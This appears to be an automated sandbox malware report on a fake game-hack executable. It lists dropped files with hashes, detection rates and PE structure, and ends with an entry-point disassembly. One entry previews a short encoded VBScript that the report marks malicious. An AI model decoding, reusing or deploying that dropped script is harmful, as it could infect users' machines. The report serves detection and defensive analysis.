                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):227
                                    Entropy (8bit):5.841796052941854
                                    Encrypted:false
                                    SSDEEP:6:GavwqK+NkLzWbH9WF08nZNDd3RL1wQJRZ7rRXN9id:Ga2MCzWL74d3XBJr7rzE
                                    MD5:D47062C8738A534FC931C0F341A61773
                                    SHA1:C1175037A0E96363DA56BC9D8ABDB726CDDC74FC
                                    SHA-256:484CC22B88E1EAAE619F948E96812EBF70275F9E6408E2E3DBD8AF827AC5199A
                                    SHA-512:9DE6DCF7944EC9F2FF44C8FDBE562A6755C2AF9800028B01FB0969921E6EF969C1ECC6E2AB129F191AC5FEEAA9AA30CF436489DFEE8E94433D6678A9942FFE39
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^ygAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]z1tmrx"+-k.h[41wzdBDNjv~4)N+tt/eF;Alts &Tw294 (lYES,!SP6C^/nQUAAAA==^#~@.
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32768
                                    Entropy (8bit):5.645950918301459
                                    Encrypted:false
                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):24064
                                    Entropy (8bit):5.492504448438552
                                    Encrypted:false
                                    SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                    MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                    SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                    SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                    SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 33%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):28160
                                    Entropy (8bit):5.570953308352568
                                    Encrypted:false
                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 4%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.529329139831718
                                    Encrypted:false
                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 3%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 38%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):22016
                                    Entropy (8bit):5.41854385721431
                                    Encrypted:false
                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 9%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):194
                                    Entropy (8bit):5.734228904570716
                                    Encrypted:false
                                    SSDEEP:6:OAlBATdOwFPU7RbVU5WMfX9mLpjTfmq2NH:OY23hU7RZ+8VjTf6H
                                    MD5:8D697F099B56FD1FA1B76AA3E9C7C8FA
                                    SHA1:A3230ABB393A92451B8449D1AC55EA3994E75064
                                    SHA-256:DB8D97DE663C409C5C0320885E5311CB34D8D1DA1145A8B0D8F5E49B2F07B439
                                    SHA-512:4E0140A8FA95E590C21C7D790F2BD5C84AAD04F750A170EE75182806E2EFBADC0DB956FA61855F1C46AAF741A30E756C3426383F9E0DB542970E7C96AC96C6B4
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):185
                                    Entropy (8bit):5.719921347724473
                                    Encrypted:false
                                    SSDEEP:3:djf1VxkzUX9VXIv0yG6LbLr0B4Y45Qxg4pKe73qLuScMkTGCLTtuGrn:DVxk4X9dIv0yG6LQTKWaKS4/LTk8n
                                    MD5:8C292B4E0E897DAD885AF84F6422E931
                                    SHA1:E22614AEE4B75CA03305421D538A3821125F7A86
                                    SHA-256:2FE9FD5D1C79D8CE54738158045CE605C9D0A58793A4C34DB216F5B25E7199CA
                                    SHA-512:8E897C962B5E389FBCA81F1889640015C47658A9D24643F70D023370EAB868F944CC97ABA77CE3D77777403CCA1FCE7D094AA439F954B3ED0496A3F790414994
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (911), with no line terminators
                                    Category:dropped
                                    Size (bytes):911
                                    Entropy (8bit):5.916577252045065
                                    Encrypted:false
                                    SSDEEP:12:BobB+o9ftwf8PZ+IEDbovenk0gjEJc0+ycNLlxW6WsmmI+vv6h10ummu4dAj5fnX:OvlVPZhKbseBgB0Wyo6LbmGdAVnM6Pz
                                    MD5:EC60BEB529476271D8B66AE2E3D2E678
                                    SHA1:7CE757448F770C49B54364D6F8E54C0BC41889C3
                                    SHA-256:8DBC1745D6D06D009380BFA2D37A55C1CA0B0E6F652F8ABA4BD9BC82E1A7AF9D
                                    SHA-512:F3C4DB93AA8BD3D774189A1CEEAB54F7244C0132ABA0CA0319C85F782140244C418EF24D28C3D855EF4EB075279BF4414EDBD364547054454FC2FA0B18F1A6B3
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with very long lines (440), with no line terminators
                                    Category:dropped
                                    Size (bytes):440
                                    Entropy (8bit):5.859005061223187
                                    Encrypted:false
                                    SSDEEP:12:PQH1tRtBj7hx2JVzsv7wUpIdeOkDtwKhEFBIPY/:PQH1tRP6J+vDI0d5w6EFBB
                                    MD5:885E79C945517241586C41D52FECE802
                                    SHA1:D5E0D06AA510679E1BA7499E1AEDFC04F9DEAAB3
                                    SHA-256:BB311682C30A9009735133CF146CC2A74DFA99DD41CF6E852F5C64480FAD0853
                                    SHA-512:F7B080A723990A9331614D980A3EDEE553DD61855F2A6E338DEDF65E28D55097ECF21B23371DD5F144FBC0C48FA04856A2E6A37CB09BB64A7B50B7A1A3814DC1
                                    Malicious:false
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.994548666910272
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:GameHackBuild1.exe.bin.exe
                                    File size:9'469'375 bytes
                                    MD5:35a0fbec2fc6d2a550a569719406d58d
                                    SHA1:bc73001a0600313803d3594dc51d3d0813dbdec1
                                    SHA256:221ec8caee4804b4c9e4ced2e1f03be897bc1993d7898b2bdc00f90a093eb87d
                                    SHA512:2f4d71eaa62dded749f82660fd7ee90da422048459d63faa79f518c3c10b7343c482e95cf81cea6bfb4710ef07f53d2d7f835dd3f191029da38da2e9a7beb00f
                                    SSDEEP:196608:uGk5oFaEPX2GgYCCUDQ4yA8/vWOCFidWo+QOovFFoJXz0Bt99OGvFLuyAjA9UCo:9k5/EP2Gac4yHndWo+bodFgXz29OGNps
                                    TLSH:FF963302EEC854B2C8712F7A52699F9426363D001F61FEDFB3945A8DE8702D0D978F66
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                                    Icon Hash:1515d4d4442f2d2d
                                    Entrypoint:0x41ec40
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                                    Instruction
                                    call 00007F4D80BE25D9h
                                    jmp 00007F4D80BE1FEDh
                                    cmp ecx, dword ptr [0043E668h]
                                    jne 00007F4D80BE2165h
                                    ret
                                    jmp 00007F4D80BE275Eh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007F4D80BD4EF7h
                                    mov dword ptr [esi], 00435580h
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 00435588h
                                    mov dword ptr [ecx], 00435580h
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    lea eax, dword ptr [ecx+04h]
                                    mov dword ptr [ecx], 00435568h
                                    push eax
                                    call 00007F4D80BE52FDh
                                    pop ecx
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007F4D80BD4E8Eh
                                    push 0043B704h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007F4D80BE4A12h
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007F4D80BE2104h
                                    push 0043B91Ch
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007F4D80BE49F5h
                                    int3
                                    jmp 00007F4D80BE6A43h
                                    jmp dword ptr [00433260h]
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push 00421EB0h
                                    push dword ptr fs:[00000000h]
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [C++] VS2015 UPD3.1 build 24215
                                    • [EXP] VS2015 UPD3.1 build 24215
                                    • [RES] VS2015 UPD3 build 24213
                                    • [LNK] VS2015 UPD3.1 build 24215
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdf98 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .rsrc | 0x63000 | 0xdf98 | 0xe000 | d4fc32bf886ae704fea4f916f9d3a59d | False | 0.637451171875 | data | 6.661378204564432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     PNG | 0x63644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                     PNG | 0x6418c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                     RT_ICON | 0x65738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                     RT_ICON | 0x65ca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                     RT_ICON | 0x66548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                     RT_ICON | 0x673f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                     RT_ICON | 0x67858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                     RT_ICON | 0x68900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                     RT_ICON | 0x6aea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                     RT_DIALOG | 0x6ec1c | 0x286 | data | English | United States | 0.5092879256965944
                                     RT_DIALOG | 0x6eea4 | 0x13a | data | English | United States | 0.60828025477707
                                     RT_DIALOG | 0x6efe0 | 0xec | data | English | United States | 0.6991525423728814
                                     RT_DIALOG | 0x6f0cc | 0x12e | data | English | United States | 0.5927152317880795
                                     RT_DIALOG | 0x6f1fc | 0x338 | data | English | United States | 0.45145631067961167
                                     RT_DIALOG | 0x6f534 | 0x252 | data | English | United States | 0.5757575757575758
                                     RT_STRING | 0x6f788 | 0x1e2 | data | English | United States | 0.3900414937759336
                                     RT_STRING | 0x6f96c | 0x1cc | data | English | United States | 0.4282608695652174
                                     RT_STRING | 0x6fb38 | 0x1b8 | data | English | United States | 0.45681818181818185
                                     RT_STRING | 0x6fcf0 | 0x146 | data | English | United States | 0.5153374233128835
                                     RT_STRING | 0x6fe38 | 0x446 | data | English | United States | 0.340036563071298
                                     RT_STRING | 0x70280 | 0x166 | data | English | United States | 0.49162011173184356
                                     RT_STRING | 0x703e8 | 0x152 | data | English | United States | 0.5059171597633136
                                     RT_STRING | 0x7053c | 0x10a | data | English | United States | 0.49624060150375937
                                     RT_STRING | 0x70648 | 0xbc | data | English | United States | 0.6329787234042553
                                     RT_STRING | 0x70704 | 0xd6 | data | English | United States | 0.5747663551401869
                                     RT_GROUP_ICON | 0x707dc | 0x68 | data | English | United States | 0.7019230769230769
                                     RT_MANIFEST | 0x70844 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
                                     DLL | Import
